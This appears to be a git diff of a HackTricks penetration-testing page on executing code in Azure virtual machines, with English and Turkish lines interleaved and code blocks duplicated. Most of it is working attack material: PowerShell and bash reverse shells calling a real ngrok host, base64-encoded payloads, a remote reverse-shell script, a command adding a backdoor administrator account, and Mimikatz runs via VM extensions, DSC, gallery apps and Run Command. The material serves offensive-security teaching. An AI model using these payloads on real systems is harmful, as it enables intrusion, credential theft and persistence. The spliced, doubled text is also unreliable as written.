echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
# Execute it
az vm extension set \
--resource-group <rsc-group> \
--vm-name <vm-name> \
--name CustomScriptExtension \
--publisher Microsoft.Compute \
--version 1.10 \
--settings '{}' \
--protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}'
--resource-group <rsc-group> \
--vm-name <vm-name> \
--name CustomScriptExtension \
--publisher Microsoft.Compute \
--version 1.10 \
--settings '{}' \
--protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}'
```
- Execute reverse shell from file
- Dosyadan ters kabuk çalıştırın
```bash
az vm extension set \
--resource-group <rsc-group> \
--vm-name <vm-name> \
--name CustomScriptExtension \
--publisher Microsoft.Compute \
--version 1.10 \
--settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \
--protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}'
--resource-group <rsc-group> \
--vm-name <vm-name> \
--name CustomScriptExtension \
--publisher Microsoft.Compute \
--version 1.10 \
--settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \
--protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}'
```
Diğer yükleri de çalıştırabilirsiniz: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add`
You could also execute other payloads like: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add`
- Reset password using the VMAccess extension
- VMAccess uzantısını kullanarak şifreyi sıfırlama
```powershell
# Run VMAccess extension to reset the password
$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Name "myVMAccess" -Credential $cred
```
{{#endtab }}
{{#endtabs }}
### Relevant VM extensions
### İlgili VM uzantıları
The required permission is still **`Microsoft.Compute/virtualMachines/extensions/write`**.
Gerekli izin hala **`Microsoft.Compute/virtualMachines/extensions/write`**.
<details>
<summary>VMAccess extension</summary>
This extension allows to modify the password (or create if it doesn't exist) of users inside Windows VMs.
<summary>VMAccess uzantısı</summary>
Bu uzantı, Windows VM'ler içindeki kullanıcıların şifresini değiştirmeye (veya yoksa oluşturmasına) olanak tanır.
```powershell
# Run VMAccess extension to reset the password
$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Name "myVMAccess" -Credential $cred
```
</details>
<details>
<summary>DesiredConfigurationState (DSC)</summary>
This is a **VM extensio**n that belongs to Microsoft that uses PowerShell DSC to manage the configuration of Azure Windows VMs. Therefore, it can be used to **execute arbitrary commands** in Windows VMs through this extension:
Bu, Azure Windows VM'lerinin yapılandırmasını yönetmek için PowerShell DSC kullanan Microsoft'a ait bir **VM uzantısı**dır. Bu nedenle, bu uzantı aracılığıyla Windows VM'lerinde **rastgele komutlar** çalıştırmak için kullanılabilir:
```powershell
# Content of revShell.ps1
Configuration RevShellConfig {
Node localhost {
Script ReverseShell {
GetScript = { @{} }
SetScript = {
$client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte, 0, $sendbyte.Length)
}
$client.Close()
}
TestScript = { return $false }
}
}
Node localhost {
Script ReverseShell {
GetScript = { @{} }
SetScript = {
$client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte, 0, $sendbyte.Length)
}
$client.Close()
}
TestScript = { return $false }
}
}
}
RevShellConfig -OutputPath .\Output
@@ -612,37 +581,35 @@ RevShellConfig -OutputPath .\Output
$resourceGroup = 'dscVmDemo'
$storageName = 'demostorage'
Publish-AzVMDscConfiguration `
-ConfigurationPath .\revShell.ps1 `
-ResourceGroupName $resourceGroup `
-StorageAccountName $storageName `
-Force
-ConfigurationPath .\revShell.ps1 `
-ResourceGroupName $resourceGroup `
-StorageAccountName $storageName `
-Force
# Apply DSC to VM and execute rev shell
$vmName = 'myVM'
Set-AzVMDscExtension `
-Version '2.76' `
-ResourceGroupName $resourceGroup `
-VMName $vmName `
-ArchiveStorageAccountName $storageName `
-ArchiveBlobName 'revShell.ps1.zip' `
-AutoUpdate `
-ConfigurationName 'RevShellConfig'
-Version '2.76' `
-ResourceGroupName $resourceGroup `
-VMName $vmName `
-ArchiveStorageAccountName $storageName `
-ArchiveBlobName 'revShell.ps1.zip' `
-AutoUpdate `
-ConfigurationName 'RevShellConfig'
```
</details>
<details>
<summary>Hybrid Runbook Worker</summary>
<summary>Hibrit Runbook Çalışanı</summary>
This is a VM extension that would allow to execute runbooks in VMs from an automation account. For more information check the [Automation Accounts service](../az-automation-account/).
Bu, bir otomasyon hesabından VM'lerde runbook'ları çalıştırmaya olanak tanıyan bir VM uzantısıdır. Daha fazla bilgi için [Otomasyon Hesapları hizmetine](../az-automation-account/) bakın.
</details>
### VM Applications
These are packages with all the **application data and install and uninstall scripts** that can be used to easily add and remove application in VMs.
### VM Uygulamaları
Bunlar, VM'lerde uygulamayı kolayca eklemek ve kaldırmak için kullanılabilecek **uygulama verileri ve yükleme ile kaldırma betikleri** içeren paketlerdir.
```bash
# List all galleries in resource group
az sig list --resource-group <res-group> --output table
@@ -650,20 +617,19 @@ az sig list --resource-group <res-group> --output table
# List all apps in a fallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table
```
These are the paths were the applications get downloaded inside the file system:
Bu, uygulamaların dosya sisteminde indirildiği yollar:
- Linux: `/var/lib/waagent/Microsoft.CPlat.Core.VMApplicationManagerLinux/<appname>/<app version>`
- Windows: `C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindows\1.0.9\Downloads\<appname>\<app version>`
Check how to install new applications in [https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli](https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli)
Yeni uygulamaların nasıl yükleneceğini kontrol edin [https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli](https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli)
> [!CAUTION]
> It's possible to **share individual apps and galleries with other subscriptions or tenants**. Which is very interesting because it could allow an attacker to backdoor an application and pivot to other subscriptions and tenants.
> **Bireysel uygulamaları ve galerileri diğer abonelikler veya kiracılar ile paylaşmak mümkündür.** Bu, bir saldırganın bir uygulamaya arka kapı açmasına ve diğer aboneliklere ve kiracılara geçiş yapmasına olanak tanıyabileceği için oldukça ilginçtir.
But there **isn't a "marketplace" for vm apps** like there is for extensions.
Ancak **vm uygulamaları için bir "pazar yeri" yoktur** uzantılar için olduğu gibi.
The permissions required are:
Gerekli izinler:
- `Microsoft.Compute/galleries/applications/write`
- `Microsoft.Compute/galleries/applications/versions/write`
@@ -671,62 +637,59 @@ The permissions required are:
- `Microsoft.Network/networkInterfaces/join/action`
- `Microsoft.Compute/disks/write`
Exploitation example to execute arbitrary commands:
Rasgele komutları çalıştırmak için istismar örneği:
{{#tabs }}
{{#tab name="Linux" }}
```bash
# Create gallery (if the isn't any)
az sig create --resource-group myResourceGroup \
--gallery-name myGallery --location "West US 2"
--gallery-name myGallery --location "West US 2"
# Create application container
az sig gallery-application create \
--application-name myReverseShellApp \
--gallery-name myGallery \
--resource-group <rsc-group> \
--os-type Linux \
--location "West US 2"
--application-name myReverseShellApp \
--gallery-name myGallery \
--resource-group <rsc-group> \
--os-type Linux \
--location "West US 2"
# Create app version with the rev shell
## In Package file link just add any link to a blobl storage file
az sig gallery-application version create \
--version-name 1.0.2 \
--application-name myReverseShellApp \
--gallery-name myGallery \
--location "West US 2" \
--resource-group <rsc-group> \
--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
--install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
--remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
--update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'"
--version-name 1.0.2 \
--application-name myReverseShellApp \
--gallery-name myGallery \
--location "West US 2" \
--resource-group <rsc-group> \
--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
--install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
--remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
--update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'"
# Install the app in a VM to execute the rev shell
## Use the ID given in the previous output
az vm application set \
--resource-group <rsc-group> \
--name <vm-name> \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
--treat-deployment-as-failure true
--resource-group <rsc-group> \
--name <vm-name> \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
--treat-deployment-as-failure true
```
{{#endtab }}
{{#tab name="Windows" }}
```bash
# Create gallery (if the isn't any)
az sig create --resource-group <rsc-group> \
--gallery-name myGallery --location "West US 2"
--gallery-name myGallery --location "West US 2"
# Create application container
az sig gallery-application create \
--application-name myReverseShellAppWin \
--gallery-name myGallery \
--resource-group <rsc-group> \
--os-type Windows \
--location "West US 2"
--application-name myReverseShellAppWin \
--gallery-name myGallery \
--resource-group <rsc-group> \
--os-type Windows \
--location "West US 2"
# Get encoded reverse shell
echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
@@ -735,79 +698,73 @@ echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",1
## In Package file link just add any link to a blobl storage file
export encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
az sig gallery-application version create \
--version-name 1.0.0 \
--application-name myReverseShellAppWin \
--gallery-name myGallery \
--location "West US 2" \
--resource-group <rsc-group> \
--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
--install-command "powershell.exe -EncodedCommand $encodedCommand" \
--remove-command "powershell.exe -EncodedCommand $encodedCommand" \
--update-command "powershell.exe -EncodedCommand $encodedCommand"
--version-name 1.0.0 \
--application-name myReverseShellAppWin \
--gallery-name myGallery \
--location "West US 2" \
--resource-group <rsc-group> \
--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
--install-command "powershell.exe -EncodedCommand $encodedCommand" \
--remove-command "powershell.exe -EncodedCommand $encodedCommand" \
--update-command "powershell.exe -EncodedCommand $encodedCommand"
# Install the app in a VM to execute the rev shell
## Use the ID given in the previous output
az vm application set \
--resource-group <rsc-group> \
--name deleteme-win4 \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \
--treat-deployment-as-failure true
--resource-group <rsc-group> \
--name deleteme-win4 \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \
--treat-deployment-as-failure true
```
{{#endtab }}
{{#endtabs }}
### User data
### Kullanıcı verisi
This is **persistent data** that can be retrieved from the metadata endpoint at any time. Note in Azure user data is different from AWS and GCP because **if you place a script here it's not executed by default**.
Bu, herhangi bir zamanda meta veri uç noktasından alınabilen **kalıcı veridir**. Azure'da kullanıcı verisinin AWS ve GCP'den farklı olduğunu unutmayın çünkü **buraya bir betik koyarsanız, varsayılan olarak çalıştırılmaz**.
### Custom data
### Özel veri
It's possible to pass some data to the VM that will be stored in expected paths:
- In **Windows** custom data is placed in `%SYSTEMDRIVE%\AzureData\CustomData.bin` as a binary file and it isn't processed.
- In **Linux** it was stored in `/var/lib/waagent/ovf-env.xml` and now it's stored in `/var/lib/waagent/CustomData/ovf-env.xml`
- **Linux agent**: It doesn't process custom data by default, a custom image with the data enabled is needed
- **cloud-init:** By default it processes custom data and this data may be in [**several formats**](https://cloudinit.readthedocs.io/en/latest/explanation/format.html). It could execute a script easily sending just the script in the custom data.
- I tried that both Ubuntu and Debian execute the script you put here.
- It's also not needed to enable user data for this to be executed.
VM'ye belirli verileri geçmek mümkündür ve bu veriler beklenen yollar içinde saklanır:
- **Windows**'ta özel veri `%SYSTEMDRIVE%\AzureData\CustomData.bin` içinde ikili dosya olarak yer alır ve işlenmez.
- **Linux**'ta `/var/lib/waagent/ovf-env.xml` içinde saklanıyordu ve şimdi `/var/lib/waagent/CustomData/ovf-env.xml` içinde saklanıyor.
- **Linux ajanı**: Varsayılan olarak özel veriyi işlemez, verinin etkin olduğu özel bir imaj gereklidir.
- **cloud-init:** Varsayılan olarak özel veriyi işler ve bu veri [**birçok formatta**](https://cloudinit.readthedocs.io/en/latest/explanation/format.html) olabilir. Sadece özel veride betiği göndererek kolayca bir betiği çalıştırabilir.
- Hem Ubuntu hem de Debian'ın buraya koyduğunuz betiği çalıştırdığını denedim.
- Bunun çalıştırılması için kullanıcı verisini etkinleştirmek de gerekmez.
```bash
#!/bin/sh
echo "Hello World" > /var/tmp/output.txt
```
### **Komut Çalıştır**
### **Run Command**
This is the most basic mechanism Azure provides to **execute arbitrary commands in VMs**. The needed permission is `Microsoft.Compute/virtualMachines/runCommand/action`.
Bu, Azure'un **VM'lerde rastgele komutlar çalıştırmak için** sağladığı en temel mekanizmadır. Gerekli izin `Microsoft.Compute/virtualMachines/runCommand/action`'dır.
{{#tabs }}
{{#tab name="Linux" }}
```bash
# Execute rev shell
az vm run-command invoke \
--resource-group <rsc-group> \
--name <vm-name> \
--command-id RunShellScript \
--scripts @revshell.sh
--resource-group <rsc-group> \
--name <vm-name> \
--command-id RunShellScript \
--scripts @revshell.sh
# revshell.sh file content
echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh
```
{{#endtab }}
{{#tab name="Windows" }}
```bash
# The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action
# Execute a rev shell
az vm run-command invoke \
--resource-group Research \
--name juastavm \
--command-id RunPowerShellScript \
--scripts @revshell.ps1
--resource-group Research \
--name juastavm \
--command-id RunPowerShellScript \
--scripts @revshell.ps1
## Get encoded reverse shell
echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
@@ -824,42 +781,37 @@ echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1
Import-module MicroBurst.psm1
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
```
{{#endtab }}
{{#endtabs }}
## Privilege Escalation
## Yetki Yükseltme
{{#ref}}
../../az-privilege-escalation/az-virtual-machines-and-network-privesc.md
{{#endref}}
## Unauthenticated Access
## Kimlik Doğrulaması Olmadan Erişim
{{#ref}}
../../az-unauthenticated-enum-and-initial-entry/az-vms-unath.md
{{#endref}}
## Post Exploitation
## Sömürü Sonrası
{{#ref}}
../../az-post-exploitation/az-vms-and-network-post-exploitation.md
{{#endref}}
## Persistence
## Süreklilik
{{#ref}}
../../az-persistence/az-vms-persistence.md
{{#endref}}
## References
## Referanslar
- [https://learn.microsoft.com/en-us/azure/virtual-machines/overview](https://learn.microsoft.com/en-us/azure/virtual-machines/overview)
- [https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/](https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/)
- [https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service](https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service)
{{#include ../../../../banners/hacktricks-training.md}}

214
src/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
View File

@@ -2,31 +2,30 @@
{{#include ../../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
Azure provides **virtual networks (VNet)** that allows users to create **isolated** **networks** within the Azure cloud. Within these VNets, resources such as virtual machines, applications, databases... can be securely hosted and managed. The networking in Azure supports both the communication within the cloud (between Azure services) and the connection to external networks and the internet.\
Moreover, it's possible to **connect** VNets with other VNets and with on-premise networks.
Azure, kullanıcıların Azure bulutunda **izole** **ağlar** oluşturmasına olanak tanıyan **sanaldan ağlar (VNet)** sağlar. Bu VNets içinde, sanal makineler, uygulamalar, veritabanları gibi kaynaklar güvenli bir şekilde barındırılabilir ve yönetilebilir. Azure'daki ağ iletişimi, bulut içindeki (Azure hizmetleri arasında) iletişimi ve dış ağlar ile internet bağlantısını destekler.\
Ayrıca, VNets'i diğer VNets ile ve yerel ağlarla **bağlamak** mümkündür.
## Virtual Network (VNET) & Subnets
## Sanal Ağ (VNET) ve Alt Ağlar
An Azure Virtual Network (VNet) is a representation of your own network in the cloud, providing **logical isolation** within the Azure environment dedicated to your subscription. VNets allow you to provision and manage virtual private networks (VPNs) in Azure, hosting resources like Virtual Machines (VMs), databases, and application services. They offer **full control over network settings**, including IP address ranges, subnet creation, route tables, and network gateways.
Azure Sanal Ağı (VNet), bulutta kendi ağınızın bir temsilidir ve aboneliğinize özel Azure ortamında **mantıksal izolasyon** sağlar. VNets, Azure'da sanal özel ağlar (VPN'ler) oluşturmanıza ve yönetmenize olanak tanır, Sanal Makineler (VM'ler), veritabanları ve uygulama hizmetleri gibi kaynakları barındırır. **Ağ ayarları üzerinde tam kontrol** sunar, IP adresi aralıkları, alt ağ oluşturma, yönlendirme tabloları ve ağ geçitleri dahil.
**Subnets** are subdivisions within a VNet, defined by specific **IP address ranges**. By segmenting a VNet into multiple subnets, you can organize and secure resources according to your network architecture.\
By default all subnets within the same Azure Virtual Network (VNet) **can communicate with each other** without any restrictions.
**Alt ağlar**, belirli **IP adresi aralıkları** ile tanımlanan bir VNet içindeki alt bölümlerdir. Bir VNet'i birden fazla alt ağa bölerek, kaynakları ağ mimarinize göre organize edebilir ve güvence altına alabilirsiniz.\
Varsayılan olarak, aynı Azure Sanal Ağı (VNet) içindeki tüm alt ağlar **birbirleriyle iletişim kurabilir** herhangi bir kısıtlama olmaksızın.
**Example:**
**Örnek:**
- `MyVNet` with an IP address range of 10.0.0.0/16.
- **Subnet-1:** 10.0.0.0/24 for web servers.
- **Subnet-2:** 10.0.1.0/24 for database servers.
- `MyVNet` IP adresi aralığı 10.0.0.0/16.
